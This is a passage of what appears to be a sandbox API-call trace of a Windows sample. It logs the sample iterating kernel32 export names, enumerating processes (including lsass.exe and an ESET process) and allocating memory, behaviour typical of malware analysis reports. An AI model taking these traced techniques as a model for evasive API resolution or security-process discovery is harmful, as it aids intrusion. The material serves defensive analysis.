lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0158.212] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0158.212] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0158.212] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0158.212] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0158.212] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0158.212] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0158.212] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0158.212] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0158.212] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0158.212] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0158.212] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0158.212] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0158.212] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0158.212] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0158.212] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0158.212] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0158.212] lstrcpyA (in: lpString1=0x239efd4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0158.213] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0158.213] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0158.213] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0158.213] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0158.213] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0158.213] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0158.213] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0158.213] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0158.213] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0158.213] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0158.213] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0158.213] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0158.213] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0158.213] lstrcpyA (in: lpString1=0x239efd4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0158.218] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0158.219] GetLastError () returned 0x0 [0158.219] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x118, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.219] GetLastError () returned 0x0 [0158.220] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x118, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0158.221] GetLastError () returned 0x0 [0158.221] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.221] GetLastError () returned 0x0 [0158.222] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0158.222] GetLastError () returned 0x0 [0158.223] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x154, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0158.223] GetLastError () returned 0x0 [0158.224] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x154, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0158.224] GetLastError () returned 0x0 [0158.225] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x154, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0158.225] GetLastError () returned 0x0 [0158.225] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.226] GetLastError () returned 0x0 [0158.227] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.227] GetLastError () returned 0x0 [0158.227] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.228] GetLastError () returned 0x0 [0158.228] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.229] GetLastError () returned 0x0 [0158.229] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.230] GetLastError () returned 0x0 [0158.230] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0158.230] GetLastError () returned 0x0 [0158.231] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.231] GetLastError () returned 0x0 [0158.232] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.232] GetLastError () returned 0x0 [0158.233] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0158.233] GetLastError () returned 0x0 [0158.233] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0158.234] GetLastError () returned 0x0 [0158.234] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x410, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0158.235] GetLastError () returned 0x0 [0158.235] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0158.243] GetLastError () returned 0x0 [0158.244] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0158.244] GetLastError () returned 0x0 [0158.244] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.245] GetLastError () returned 0x0 [0158.245] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x428, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0158.246] GetLastError () returned 0x0 [0158.246] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x428, pcPriClassBase=8, dwFlags=0x0, szExeFile="eset.exe")) returned 1 [0158.247] GetLastError () returned 0x0 [0158.247] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x50c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0158.248] GetLastError () returned 0x0 [0158.248] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0158.249] GetLastError () returned 0x0 [0158.249] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0158.253] VirtualAlloc (lpAddress=0x0, dwSize=0x1262, flAllocationType=0x3000, flProtect=0x4) returned 0x90000 [0158.253] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x110000 [0158.253] VirtualAlloc (lpAddress=0x0, dwSize=0x1f4, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0158.255] lstrlenA (lpString="kernel32.dll") returned 12 [0158.255] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.256] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.256] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.256] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.256] lstrlenA (lpString="ADDATOMA") returned 8 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.256] lstrlenA (lpString="ADDATOMW") returned 8 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.256] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.256] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.256] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.256] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.256] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.256] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.256] lstrcpyA (in: lpString1=0x239f158, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.256] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.257] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.257] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.257] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.257] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.257] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.257] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.257] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.257] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.257] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.257] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.257] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.257] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.257] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.257] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.257] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.257] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.258] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.258] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.258] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.258] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.258] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.258] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.258] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.258] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.258] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.258] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.259] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.259] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.259] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.259] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.259] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.259] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.259] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.259] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.259] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.259] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.259] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.259] lstrcpyA (in: lpString1=0x239f158, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.259] 